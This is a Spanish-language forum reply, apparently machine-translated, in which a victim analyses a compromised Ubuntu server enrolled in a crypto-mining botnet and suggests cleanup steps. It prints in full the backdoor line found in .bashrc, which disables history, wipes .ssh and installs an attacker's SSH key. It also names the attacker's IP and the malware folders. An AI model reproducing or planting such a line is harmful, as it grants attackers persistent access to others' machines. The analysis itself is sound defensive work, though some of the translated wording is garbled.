A mí me pasó lo mismo y me di cuenta ayer. /var/log/syslog
Revisé el archivo y esta IP (185.234.218.40) parecía estar ejecutando automáticamente cronjobs.
Lo revisé en http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) y tiene algunos informes. Estos archivos fueron editados por el troyano:
- .bashrc
- .ssh / autorizado_claves
Encontré esto al final de .bashrc
(que se ejecuta cada vez que se abre bash):
set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
Está eliminando su authorized_keys
archivo, que es una lista de claves SSH que pueden conectarse sin contraseña. Luego, agrega la clave SSH del atacante:
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr
Además, encontré esta carpeta: /tmp/.X13-unix/.rsync
donde está todo el malware. Incluso encontré un archivo, /tmp/.X13-unix/.rsync/c/ip
un archivo que contiene 70 000 direcciones IP, que probablemente sean otras víctimas o servidores de nodo.
Hay 2 soluciones: A:
Agregue un firewall que bloquee todas las conexiones salientes, excepto el puerto 22 y otros que considere necesarios, y habilite fail2ban, un programa que prohíbe una dirección IP después de X intentos fallidos de contraseña
Elimine todos los trabajos cron:
ps aux | grep cron
luego elimine el PID que aparece
Cambie su contraseña a una segura
SI:
Haga una copia de seguridad de cualquier archivo o carpeta que necesite o desee
Restablezca el servidor y reinstale Ubuntu, o cree directamente una nueva gota
Como dijo Thom Wiggers, ciertamente eres parte de una botnet de minería de bitcoin y tu servidor tiene una puerta trasera . La puerta trasera emplea un exploit perl, un archivo ubicado aquí: que /tmp/.X13-unix/.rsync/b/run
contiene esto ( https://pastebin.com/ceP2jsUy )
Las carpetas más sospechosas que encontré fueron:
Finalmente, hay un artículo relacionado con Perl Backdoor aquí:
https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/
Espero que encuentres esto útil.
.firefoxcatche
probablemente no tenga nada que ver con firefox, ¿podría ser solo un minero de bitcoin? Intenta subir los ejecutables a virustotal.